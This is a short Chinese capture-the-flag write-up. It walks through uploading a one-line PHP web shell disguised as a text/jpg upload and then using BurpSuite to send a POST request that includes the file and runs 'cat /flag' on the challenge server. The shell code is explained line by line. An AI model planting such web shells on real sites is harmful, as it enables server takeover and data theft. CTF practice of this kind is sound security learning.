1、先打开链接,上传一个普通文件,发现它会被默认存为一个jpg文件,那么通过蚁剑的方式是行不通的。
2、新建一个txt文件,将下面内容贴进去
<?php @eval(system($_POST["x"]));?>
// @符号 表示后面的语句即使执行错误,也不报错。
// eval() 把括号内的字符串全部当作php代码来执行
// system 执行外部程序,并且显示输出
// $_POST 用于收集来自 method="post" 的表单中的值
// 所以,这句代码的意思就是用php的方式收集 x 的值,执行x并输出
3、将txt文件上传,复制图片地址,打开浏览器、BurpSuite代理,将请求参数进行修改
Method:GET -> POST
请求参数:添加两个 {"file": "uploads/6520874b1e440.jpg", "x": "cat /flag"}
可以看到返回的结果中执行了 cat /flag